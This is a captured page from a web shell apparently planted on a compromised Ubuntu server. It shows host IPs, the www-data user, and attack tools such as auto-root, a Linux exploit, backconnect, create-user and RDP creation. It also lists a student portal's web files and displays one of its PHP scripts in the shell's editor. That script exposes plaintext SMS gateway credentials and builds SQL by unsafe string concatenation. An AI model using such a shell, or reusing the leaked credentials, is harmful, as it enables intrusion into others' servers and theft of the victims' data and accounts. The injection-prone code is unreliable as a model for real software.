Linux ip-172-26-7-228 5.4.0-1103-aws #111~18.04.1-Ubuntu SMP Tue May 23 20:04:10 UTC 2023 x86_64
Apache
: 172.26.7.228 | : 3.16.130.96
Cant Read [ /etc/named.conf ]
5.6.40-24+ubuntu18.04.1+deb.sury.org+1
www-data
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
studentportal_test /
[ HOME SHELL ]
Name
Size
Permission
Action
css
[ DIR ]
drwxr-xr-x
html_modules
[ DIR ]
drwxr-xr-x
images
[ DIR ]
drwxr-xr-x
js
[ DIR ]
drwxr-xr-x
plugins
[ DIR ]
drwxr-xr-x
src
[ DIR ]
drwxr-xr-x
MainPage.html
7.6
KB
-rwxr-xr-x
MainPage2.html
15.28
KB
-rwxr-xr-x
Thumbs.db
2.5
KB
-rwxr-xr-x
background.jpg
42.45
KB
-rwxr-xr-x
cManualMailer.php
3.69
KB
-rwxr-xr-x
cronjob_sendsms.php
1.77
KB
-rwxr-xr-x
database.php
377
B
-rwxr-xr-x
forgot-password.html
5.51
KB
-rwxr-xr-x
forgot-password.php
2.19
KB
-rwxr-xr-x
forgotPassword.html
4.85
KB
-rwxr-xr-x
getLocation.php
429
B
-rwxr-xr-x
getstatesanduniv.php
419
B
-rwxr-xr-x
helpdesk.html
2.2
KB
-rwxr-xr-x
index.html
5.16
KB
-rwxr-xr-x
index2.html
9.49
KB
-rwxr-xr-x
instruction.html
4.46
KB
-rwxr-xr-x
lastdate.html
3.14
KB
-rwxr-xr-x
pgResponse.php
4.3
KB
-rwxr-xr-x
registration.html
7.25
KB
-rwxr-xr-x
registration.php
543
B
-rwxr-xr-x
resetpassword.php
696
B
-rwxr-xr-x
sendGridMail.php
1.2
KB
-rwxr-xr-x
sendMobEmailOTP.php
3.44
KB
-rwxr-xr-x
sendsmsapi.php
434
B
-rwxr-xr-x
sendsmsbulk.php
791
B
-rwxr-xr-x
sign-up.html
12.02
KB
-rwxr-xr-x
signin.php
1.43
KB
-rwxr-xr-x
signup.php
830
B
-rwxr-xr-x
smspush.php
6.61
KB
-rwxr-xr-x
smspush_bkp.php
2.85
KB
-rwxr-xr-x
validateInfo.php
1.69
KB
-rwxr-xr-x
validateRegno.php
562
B
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : cronjob_sendsms.php
<?php include ("database.php"); include("sendsmsbulk.php"); $query = "select fenttype,group_concat(concat('91',fmobileno)) as mobilenos, fmessage from tmpsms where ifnull(fstatus, 'F') = 'F' and fmobileno is not null group by fenttype"; $result = mysqli_query($conn,$query); $count = mysqli_num_rows($result); $username = 'logisyhttp'; $password = 'Logis986'; $from = 'LOGINF'; $category = 'bulk'; if($count >0) { while($row = mysqli_fetch_assoc($result)) { $rgBigArr = explode(',', $row['mobilenos']); $rgSmallArr = array_chunk($rgBigArr,100); $text = $row['fmessage']; foreach($rgSmallArr as $key => $value) { $strTo = implode(',', $value); $response = sendsmaapibulk($username,$password,$from,$strTo,$text,$category); $rgExpAmp = explode('&', $response); array_walk($rgExpAmp, function($val,$key) use(&$final){ list($key, $value) = explode('=', $val); $final[$key] = $value; }); $errorcode = explode(',', $final['errorcode']); $mobnos = explode(',', $final['seqno']); $rgInsert = array(); $rgTrimedMobs = array(); for($i = 0; $i < count($mobnos);$i++) { $rgInsert[] = "('".substr($mobnos[$i],2,11)."','".$errorcode[$i]."','".$final['guid']."','".$row['fenttype']."', DATE_FORMAT(NOW(),'%Y-%m-%d'), DATE_FORMAT(NOW(),'%T'))"; $rgTrimedMobs[$i] = substr($mobnos[$i],2,11); } $strInsertQuery = "insert into smslog(fmobileno, freasoncode, fguid, fenttype, fackdate, facktime) values".implode(',',$rgInsert); $result1 = mysqli_query($conn,$strInsertQuery); $srtImplodedMobs = implode("','",$rgTrimedMobs); $strUpdateQuery = "update tmpsms set fstatus = 'T' where fenttype = '{$row['fenttype']}' and fmobileno in ('{$srtImplodedMobs}')"; $result2 = mysqli_query($conn,$strUpdateQuery); } } } ?>
Close